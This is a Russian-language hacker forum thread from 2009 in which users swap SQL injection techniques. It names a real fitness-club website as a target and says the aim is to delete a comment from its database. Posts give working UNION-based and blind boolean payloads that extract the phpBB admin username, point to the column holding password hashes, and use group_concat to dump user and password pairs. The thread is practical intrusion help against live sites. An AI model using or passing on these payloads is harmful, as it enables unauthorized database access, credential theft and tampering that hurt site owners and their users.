06.02.2009, 19:03
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
С нами:
9591697
Репутация:
96
|
|
Сформировал запрос под свой url:
+or+1=(select Email from EmailTable where Email not in (select top 2 Email from EmailTable))--
выдает:
Microsoft OLE DB Provider for SQL Server error '80004005'
Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.
/xxx/xxx.asp, line 156
|
|
|
06.02.2009, 20:10
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами:
9230381
Репутация:
90
|
|
Возможно ли в php-инъекции как-нибудь вывести содержимое директории, а не файла?
|
|
|
|
06.02.2009, 20:20
|
|
Новичок
Регистрация: 06.02.2009
Сообщений: 2
С нами:
9083950
Репутация:
0
|
|
Загадочный SQL inj
Вот такой SQL inj
http://www.moscowfitness.ru/find.php?cname=bebebe'
Долго не мог подобрать не одной таблицы, а потом попробовал вот так
http://www.moscowfitness.ru/find.php?cname=bebebe' UNION select 1 FROM CLUBS/*
и удивился.
Вышло следующее
Код:
select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID
MYSQL заявил, что "Table 'db10002m.clubs' doesn't exist"
Как такое может быть? Для первой части запроса таблица CLUBS есть, а для второй уже нет.
Или это так приведение к нижнему регистру влияет?
p.s. Глобальная задача найти таблицу с комментариями и удалить один из комментариев. |
|
|
|
06.02.2009, 21:55
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от new_daemon
Как такое может быть?
Должно быть таблица clubs находится в другой бд.
http://www.moscowfitness.ru/find.php?cname=bebebe'+or+1=if(ascii(substring((se lect+username+from+phpbb_users+limit+0,1),1,1))>=6 5,1,0)/*
Если я не намудрил с запросом, то первый символ логина админа форума - 'A'. Дальше сам )
//наверно дальше будет 'dmin' ^^
Хеши лежат в колумне user_password
|
|
|
|
06.02.2009, 23:07
|
|
Новичок
Регистрация: 06.02.2009
Сообщений: 2
С нами:
9083950
Репутация:
0
|
|
Сообщение от ElteRUS
Должно быть таблица clubs находится в другой бд.
Меня по этому поводу тоже мысль посетила, но в SQL запрос вывелся весь на экран и в нем нет явного задания БД для первой таблицы CLUBS
select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID
Если бы даже перед этим запросом выполнялся USE имя_бд то его действие распространялось и на вторую часть запроса.
А доступ нужно получить не к форму а комментариям о фитнес-клубах. Т.е к основным таблицам сайта. А при "отсутствии" даже самой CLUBS подбирать название таблицы с комментами дело бесперспективное.
|
|
|
|
06.02.2009, 22:33
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
такой вопрос,
есть скуля http://www.site.com/index.php?id=-1+union+select+concat(user,password)+from+user+lim it+0,1--
выводит admin,pass
потом меняя limit выводим след записи..
можно ли как нибудь (не используя софта) сразу вывести все записи в браузер одним запросом
п.с http://www.site.com/index.php?id=-1+union+select+concat(user,password)+from+user--
выводит только первую
п.п.с записей много
|
|
|
|
06.02.2009, 22:37
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами:
9133681
Репутация:
90
|
|
z00MAN можешь попробывать group_concat(user,password)
|
|
|
|
06.02.2009, 22:36
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Если выводит по одной записи - нет.
Можно, конечно, использовать group_concat(), но будет вывод только 1024 символов (по умолчанию)
|
|
|
|
06.02.2009, 23:18
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
new_daemon, там 4 ветка, information_schema отсутствует, так что только угадыванием )
|
|
|
|
06.02.2009, 23:53
|
|
Новичок
Регистрация: 04.12.2007
Сообщений: 6
С нами:
9702655
Репутация:
1
|
|
Всем доброго времени суток. Хотелось бы знать одну вещь:
является ли www.site.ru/?n=1" уязвимым, если выдается ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2009-02-06 22:49:35", "***.***.***.***", 1) ON DUPLICATE KEY UPDATE page="/?n=1"", ' at line 1
и если да, то как подобрать кол-во таблиц. По этой ссылке http://forum.antichat.ru/thread43966.html говорится, что должна быть ошибка
«The used SELECT statements have a different number of columns»,
но у меня выходит почти та же ошибка (за исключением server version for the right syntax to use near 'UNION%20SELECT%201,%202%20--","2009-02-06 ) ON DUPLI' at line 1)
Может кто нить обьяснит дилетанту, что сие означает? ^_^
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
